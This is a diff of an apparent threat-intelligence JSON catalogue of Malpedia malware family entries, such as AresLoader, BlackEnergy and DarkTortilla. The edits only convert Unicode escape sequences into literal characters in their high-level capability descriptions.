- "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The \u201cAndro\u201d part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and \u201cMut\u201d is based off a mutex that the analyzed sample creates: \u201cmutshellmy777\u201d.",
+ "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and “Mut” is based off a mutex that the analyzed sample creates: “mutshellmy777”.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut",
@@ -13804,7 +13804,7 @@
 "value": "Ares (Windows)"
 },
 {
- "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums \u201cRAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed \u201cProject Ares,\u201d was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer \u201cCerberSec.\u201d\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
+ "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader",
@@ -13920,7 +13920,7 @@
 "value": "Arkei Stealer"
 },
 {
- "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It\u2019s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
+ "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat",
@@ -14108,7 +14108,7 @@
 "value": "AstraLocker"
 },
 {
- "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim\u2019s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.",
+ "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat",
@@ -14312,7 +14312,7 @@
 "value": "ATOMSILO"
 },
 {
- "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.",
+ "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor",
@@ -14776,7 +14776,7 @@
 "value": "Azov Wiper"
 },
 {
- "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers\u2019 analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.",
+ "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda",
@@ -15343,7 +15343,7 @@
 "value": "Bankshot"
 },
 {
- "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.",
+ "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex",
@@ -15802,7 +15802,7 @@
 "value": "BestKorea"
 },
 {
- "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that\u2019s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim\u2019s machine and steal sensitive information.",
+ "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
@@ -15868,7 +15868,7 @@
 "value": "BHunt"
 },
 {
- "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization\u2019s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims\u2019 systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ",
+ "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian",
@@ -16073,7 +16073,7 @@
 "value": "Bitter RAT"
 },
 {
- "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer\u2019s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT\u2019s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
+ "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
@@ -16318,7 +16318,7 @@
 "value": "BLACKCOFFEE"
 },
 {
- "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
+ "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
@@ -16697,7 +16697,7 @@
 "value": "BleachGap"
 },
 {
- "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.",
+ "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
@@ -16983,7 +16983,7 @@
 "value": "Bolek"
 },
 {
- "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim\u2019s filesystem, basic process management and the download and execution of additional tools from the attacker\u2019s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.",
+ "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim’s filesystem, basic process management and the download and execution of additional tools from the attacker’s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat",
@@ -17045,7 +17045,7 @@ "value": "BOOMBOX" }, { - "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", + "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite", @@ -17160,7 +17160,7 @@ "value": "BRAIN" }, { - "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.", + "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", 
@@ -17224,7 +17224,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" 
@@ -17923,7 +17923,7 @@ "value": "Carberp" }, { - "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", + "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", 
@@ -18226,7 +18226,7 @@ "value": "Chaos (Windows)" }, { - "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", + "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone", 
@@ -20552,7 +20552,7 @@ "value": "CoViper" }, { - "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n\u2022 Command execution module for executing arbitrary Windows Command Prompt commands\r\n\u2022 Password stealer module\r\n\u2022 NT LAN Manager (NTLM) hash stealer module\r\n\u2022 System information gathering module\r\n\u2022 Screenshot module", + "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke", 
@@ -21392,7 +21392,7 @@ "value": "Cutwail" }, { - "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim\u2019s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", + "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim’s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", 
@@ -21539,7 +21539,7 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", 
@@ -22037,7 +22037,7 @@ "value": "DarkTequila" }, { - "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks\u00ae Counter Threat Unit\u2122 (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", + "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. 
It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla", 
@@ -22539,7 +22539,7 @@ "value": "Dented" }, { - "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", + "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", 
@@ -22593,7 +22593,7 @@ "value": "DeroHE" }, { - "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", 
